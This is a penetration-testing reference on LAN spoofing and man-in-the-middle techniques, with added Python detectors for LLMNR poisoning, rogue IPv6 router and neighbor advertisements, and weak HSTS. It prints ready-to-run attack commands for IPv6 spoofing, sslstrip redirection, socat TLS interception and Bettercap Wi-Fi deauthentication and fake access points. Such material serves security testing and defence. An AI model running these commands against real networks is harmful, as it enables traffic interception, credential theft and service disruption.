When DNS lookups fail, Microsoft systems rely on Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS). Similarly, Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network. Because these protocols are unauthenticated and operate over UDP, broadcasting messages, they can be exploited by attackers aiming to redirect users to malicious services.

Responder can be used to send fake responses to impersonate services that hosts search for.
See How to Impersonate services with Responder for more information.

Spoofing WPAD

Browsers commonly employ the Web Proxy Auto-Discovery (WPAD) protocol to automatically acquire proxy settings. This involves fetching configuration details from a server, specifically through a URL such as "http://wpad.example.org/wpad.dat". The discovery of this server by the clients can happen through various mechanisms:

  • Through DHCP, where the discovery is facilitated by utilizing a special code 252 entry.
  • By DNS, which involves searching for a hostname labeled wpad within the local domain.
  • Via Microsoft LLMNR and NBT-NS, which are fallback mechanisms used in cases where DNS lookups do not succeed.

Responder can act as a malicious WPAD server to take advantage of this protocol. It uses DHCP, DNS, LLMNR, and NBT-NS to mislead clients into connecting to it. Check this for more information on how services can be impersonated using Responder.
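
Both the LLMNR/NBT-NS/mDNS section and the WPAD section above depend on a host answering multicast name queries for names it does not own (wpad among them). Defenders can turn that into a detector: query the LLMNR group for a name that cannot exist on the network and alert on anyone who answers. The Python below is an added example, not code from the page or from Responder; the canary name, transaction ID and the sample reply used in its test are constructed, and only LLMNR (UDP 5355, group 224.0.0.252 per RFC 4795) is implemented, although the same check can be repeated against the mDNS and NBT-NS ports.

```python
import secrets
import socket
import struct
from typing import Optional

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # RFC 4795 IPv4 multicast group and port


def encode_name(name: str) -> bytes:
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def canary_name() -> str:
    """A hostname that cannot exist on the segment, so nobody should answer for it."""
    return "canary-" + secrets.token_hex(4)


def build_llmnr_query(name: str, txid: int) -> bytes:
    """LLMNR reuses the DNS header and question layout; a query has all flags clear."""
    return (struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
            + encode_name(name) + struct.pack("!HH", 1, 1))    # QTYPE A, QCLASS IN


def classify_response(query: bytes, response: bytes, responder: str) -> Optional[dict]:
    """Decide whether `response` is a poisoning answer to our canary `query`.
    A healthy network produces no reply at all to a random name, so any well-formed
    answer that echoes our question comes from a name-poisoning host."""
    if len(response) < 12:
        return None
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", response[:12])
    txid_ok = txid == struct.unpack("!H", query[:2])[0]
    question_echoed = qd == 1 and response[12:len(query)] == query[12:]
    return {
        "responder": responder,
        "txid_match": txid_ok,
        "question_echoed": question_echoed,
        "answers": an,
        "poisoning": txid_ok and question_echoed and bool(flags & 0x8000) and an > 0,
    }


def probe(timeout: float = 2.0) -> Optional[dict]:
    """Send one canary query to the LLMNR group and report who (if anyone) answers.
    Run it periodically from a monitoring host; a hit means a poisoner is on the segment."""
    name, txid = canary_name(), secrets.randbelow(1 << 16)
    query = build_llmnr_query(name, txid)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)  # stay on the local link
    sock.settimeout(timeout)
    try:
        sock.sendto(query, (LLMNR_GROUP, LLMNR_PORT))
        data, (ip, _) = sock.recvfrom(512)
    except socket.timeout:
        return None                                  # silence is the healthy outcome
    finally:
        sock.close()
    return classify_response(query, data, ip)
```

The reported `responder` address is the evidence to act on; the usual fix is to disable LLMNR and NBT-NS on Windows hosts via policy and to block UDP 5355 and 137 at the host firewall so the protocols are never consulted in the first place.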

Spoofing SSDP and UPnP devices

You can offer different services in the network to try to trick a user into entering some plain-text credentials. More information about this attack in Spoofing SSDP and UPnP Devices.

IPv6 Neighbor Spoofing

This attack is very similar to ARP Spoofing but in the IPv6 world. You can make the victim think that the IPv6 address of the GW has the MAC of the attacker.

sudo parasite6 -l eth0 # This option will respond to every request, spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

IPv6 Router Advertisement Spoofing/Flooding

Some OSes configure the default gateway from the RA packets sent on the network. To declare the attacker as an IPv6 router you can use:

sysctl -w net.ipv6.conf.all.forwarding=1
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16
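
Both IPv6 attacks above (Neighbor Advertisement spoofing with parasite6/fake_advertise6 and Router Advertisement spoofing with fake_router6) are visible on the wire as ICMPv6 Neighbor Discovery messages, and a monitor that knows the legitimate routers can flag them. The following Python is an added example, not code from the page or from the THC-IPv6 tools: it parses RA (type 134) and NA (type 136) packets and raises a reason when an RA comes from a router outside the allow-list, when a source MAC disagrees with the known router, when an NA rebinds a known router address to another MAC, or when the hop limit is not 255 (RFC 4861 requires it, so anything else was forwarded from off-link). The packet builders, addresses and MACs are constructed for the example.

```python
import ipaddress
import struct
from typing import Dict, Optional

ICMPV6, RA, NA = 58, 134, 136
OPT_SRC_LLADDR, OPT_TGT_LLADDR, OPT_PREFIX = 1, 2, 3
NA_OVERRIDE = 0x20000000


def _mac(b: bytes) -> str:
    return ":".join("%02x" % x for x in b)


def _ipv6(src: str, dst: str, icmp: bytes, hop_limit: int = 255) -> bytes:
    """IPv6 header (40 bytes) + ICMPv6 body; ND packets always carry hop limit 255."""
    return struct.pack("!IHBB16s16s", 0x60000000, len(icmp), ICMPV6, hop_limit,
                       ipaddress.IPv6Address(src).packed, ipaddress.IPv6Address(dst).packed) + icmp


def build_ra(src: str, mac: str, prefix: str, plen: int, lifetime: int = 1800) -> bytes:
    """Constructed Router Advertisement with source link-layer and prefix options."""
    icmp = struct.pack("!BBHBBHII", RA, 0, 0, 64, 0, lifetime, 0, 0)
    icmp += struct.pack("!BB6s", OPT_SRC_LLADDR, 1, bytes.fromhex(mac.replace(":", "")))
    icmp += struct.pack("!BBBBIII", OPT_PREFIX, 4, plen, 0xC0, 2592000, 604800, 0)
    icmp += ipaddress.IPv6Address(prefix).packed
    return _ipv6(src, "ff02::1", icmp)


def build_na(src: str, target: str, mac: str, override: bool = True) -> bytes:
    """Constructed Neighbor Advertisement claiming that `target` lives at `mac`."""
    icmp = struct.pack("!BBHI16s", NA, 0, 0, NA_OVERRIDE if override else 0,
                       ipaddress.IPv6Address(target).packed)
    icmp += struct.pack("!BB6s", OPT_TGT_LLADDR, 1, bytes.fromhex(mac.replace(":", "")))
    return _ipv6(src, "ff02::1", icmp)


def _options(data: bytes) -> Dict[int, bytes]:
    """Split ND options (type, length in 8-octet units, body) into {type: body}."""
    opts, off = {}, 0
    while off + 2 <= len(data):
        otype, olen = data[off], data[off + 1]
        if olen == 0:                                   # RFC 4861: zero length is invalid
            break
        opts[otype] = data[off + 2:off + 8 * olen]
        off += 8 * olen
    return opts


def inspect_nd(pkt: bytes, trusted_routers: Dict[str, str]) -> Optional[dict]:
    """Inspect one IPv6 packet; `trusted_routers` maps a router's link-local address
    to its MAC. Returns None for non-ND traffic, else a record with `reasons`."""
    if len(pkt) < 56 or pkt[0] >> 4 != 6 or pkt[6] != ICMPV6:
        return None
    src = str(ipaddress.IPv6Address(pkt[8:24]))
    icmp = pkt[40:]
    kind = icmp[0]
    if kind not in (RA, NA) or len(icmp) < (16 if kind == RA else 24):
        return None
    trusted = {str(ipaddress.IPv6Address(k)): v.lower() for k, v in trusted_routers.items()}
    rec: dict = {"type": "RA" if kind == RA else "NA", "src": src, "reasons": []}
    if pkt[7] != 255:
        rec["reasons"].append("hop limit != 255 (not link-local origin)")
    if kind == RA:
        rec["lifetime"] = struct.unpack("!H", icmp[6:8])[0]
        opts = _options(icmp[16:])
        rec["mac"] = _mac(opts[OPT_SRC_LLADDR][:6]) if OPT_SRC_LLADDR in opts else None
        p = opts.get(OPT_PREFIX)
        rec["prefix"] = "%s/%d" % (ipaddress.IPv6Address(p[14:30]), p[0]) if p else None
        if src not in trusted:
            rec["reasons"].append("RA from router not in allow-list")
        elif rec["mac"] and rec["mac"] != trusted[src]:
            rec["reasons"].append("RA source MAC does not match known router")
    else:
        rec["target"] = str(ipaddress.IPv6Address(icmp[8:24]))
        rec["override"] = bool(struct.unpack("!I", icmp[4:8])[0] & NA_OVERRIDE)
        opts = _options(icmp[24:])
        rec["mac"] = _mac(opts[OPT_TGT_LLADDR][:6]) if OPT_TGT_LLADDR in opts else None
        if rec["target"] in trusted and rec["mac"] != trusted[rec["target"]]:
            rec["reasons"].append("NA rebinds a known router address to another MAC")
    rec["suspicious"] = bool(rec["reasons"])
    return rec


# Preventive controls: RA Guard (RFC 6105) on access switches, and on hosts that do
# not need SLAAC, sysctl -w net.ipv6.conf.all.accept_ra=0.
```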

IPv6 DHCP spoofing

By default, some OSes try to configure DNS by reading a DHCPv6 packet on the network. An attacker could therefore send a DHCPv6 packet to configure themselves as the DNS server. The DHCPv6 server also provides an IPv6 address to the victim.

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

HTTP (fake page and JS code injection)

Internet Attacks

sslStrip

Basically, this attacks the case where a user tries to access an HTTP page that redirects to its HTTPS version: sslStrip maintains an HTTP connection with the client and an HTTPS connection with the server, so it is able to sniff the connection in plain text.

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all -l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

sslStrip+ and dns2proxy bypassing HSTS

The difference between sslStrip+ with dns2proxy and plain sslStrip is that they use redirection to bypass HSTS.
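
Whether sslStrip or the sslStrip+ / dns2proxy variant works against a site comes down to its HTTP-to-HTTPS redirect and the Strict-Transport-Security policy it sends. The Python below is an added example, not code from the page or from the sslstrip project: it parses an HSTS header per RFC 6797 and lists, for one HTTP response, the gaps a stripping attacker would rely on. The header values and status codes are constructed test inputs; in practice you feed it the responses of a real HTTP client.

```python
from typing import Dict, List

ONE_YEAR = 31536000  # minimum max-age the preload list accepts


def parse_hsts(value: str) -> dict:
    """Parse a Strict-Transport-Security value; directive names are case-insensitive."""
    policy: dict = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                policy["max_age"] = int(val.strip().strip('"'))
            except ValueError:
                pass                      # unparsable max-age leaves the header invalid
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy


def audit_response(scheme: str, status: int, headers: Dict[str, str]) -> List[str]:
    """Return the weaknesses an SSL-stripping attacker could use, for one response."""
    h = {k.lower(): v for k, v in headers.items()}
    findings: List[str] = []
    if scheme == "http":
        # Browsers ignore HSTS received over plain HTTP (RFC 6797 section 7.2), so the
        # only useful thing an HTTP response can do is redirect straight to HTTPS.
        if not (300 <= status < 400 and h.get("location", "").lower().startswith("https://")):
            findings.append("HTTP response does not redirect to HTTPS; sslStrip can keep the client on HTTP")
        return findings
    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("no Strict-Transport-Security header; every visit starts strippable")
        return findings
    policy = parse_hsts(hsts)
    if policy["max_age"] is None:
        findings.append("HSTS max-age missing or malformed; browsers ignore the header")
    elif policy["max_age"] < ONE_YEAR:
        findings.append("HSTS max-age shorter than one year")
    if not policy["include_subdomains"]:
        findings.append("HSTS lacks includeSubDomains; hostnames below this one that the "
                        "browser has never visited get no protection")
    if not policy["preload"]:
        findings.append("HSTS not preloaded; the very first visit is still strippable")
    return findings
```

Note that includeSubDomains only covers names beneath the host that sent it. To protect a lookalike sibling hostname the browser has never seen, the policy has to be set on the apex domain with includeSubDomains, which is also what the browser preload list requires before it will carry the domain.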

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

TCP + SSL listen in port

Generate keys and a self-signed certificate

$ openssl genrsa -out private.key 2048
$ openssl req -new -x509 -key private.key -out certificate.crt -days 365

Import the certificate into the trusted store

$ sudo cp certificate.crt /usr/local/share/ca-certificates/
$ sudo update-ca-certificates

Start the TCP + SSL listener

$ socat openssl-listen:443,reuseaddr,fork,cert=certificate.crt,key=private.key tcp4-listen:8443,reuseaddr,fork
FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

Listen using certificate

To listen to network traffic using a certificate, you can follow these steps:

  1. Obtain a valid certificate: You will need a valid certificate to decrypt the network traffic. This can be either a self-signed certificate or a certificate issued by a trusted Certificate Authority (CA).

  2. Install the certificate: Once you have the certificate, you need to install it on the device or application that you will be using to intercept the network traffic. This can usually be done by importing the certificate into the device's certificate store or configuring the application to use the certificate.

  3. Configure the interception tool: Next, you will need to configure the interception tool to use the installed certificate. This can involve specifying the certificate's location or providing the necessary credentials to access the certificate.

  4. Start the interception: Once everything is set up, you can start the interception process. The interception tool will intercept the network traffic and use the installed certificate to decrypt the encrypted data.

  5. Analyze the decrypted traffic: Finally, you can analyze the decrypted network traffic to gain insights into the communication between the client and the server. This can help you identify vulnerabilities or potential security issues.

It is important to note that intercepting network traffic using a certificate may be subject to legal restrictions and should only be done with proper authorization and for legitimate purposes.

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

Listen using certificate and redirect to the hosts

To listen on a specific port using a certificate and redirect the traffic to different hosts, you can follow these steps:

  1. Generate or obtain a valid SSL/TLS certificate for the domain you want to use. This certificate will be used to establish a secure connection with the clients.

  2. Configure your server to listen on the desired port (e.g., port 443 for HTTPS) and use the obtained certificate for SSL/TLS encryption.

  3. Set up the necessary DNS records to point the domain to the IP address of your server.

  4. Configure the server to redirect incoming traffic to the appropriate hosts based on the requested domain. This can be done using reverse proxy configurations or load balancers.

  5. Test the setup by accessing the domain from a client machine. The traffic should be redirected to the correct host based on the requested domain.

By following these steps, you can listen on a specific port using a certificate and redirect the traffic to different hosts based on the requested domain. This can be useful in scenarios where you have multiple services running on different hosts but want to use a single domain for accessing them securely.

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

Sometimes, if the client checks that the CA is a valid one, you could serve a certificate for another hostname signed by a trusted CA.
Another interesting test is to serve a self-signed certificate for the requested hostname.

Other things to test: try to sign the certificate with a valid certificate that is not a valid CA; or use the valid public key, force a key exchange such as Diffie-Hellman (one that does not require decrypting anything with the real private key), and when the client requests a proof of possession of the real private key (such as a signature over a hash), send a fake proof and see whether the client fails to check it.

Bettercap

# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latest 5 events
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap

Active Discovery Notes

Take into account that when a UDP packet is sent to a device that does not have the requested port open, an ICMP Port Unreachable is sent back.

ARP discover

ARP packets are used to discover which IPs are in use inside the network. The PC has to send a request for each possible IP address, and only the ones in use will respond.

mDNS (multicast DNS)

Bettercap sends an mDNS request (every X ms) asking for _services_.dns-sd._udp.local; machines that see this packet usually answer the request. Then it only searches for machines answering for "services".

Tools

  • Avahi-browser (--all)
  • Bettercap (net.probe.mdns)
  • Responder

NBNS (NetBios Name Server)

Bettercap broadcasts packets to port 137/UDP asking for the name "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

SSDP (Simple Service Discovery Protocol)

Bettercap broadcasts SSDP packets searching for all kinds of services (UDP port 1900).

WSD (Web Service Discovery)

Bettercap broadcasts WSD packets searching for services (UDP port 3702).
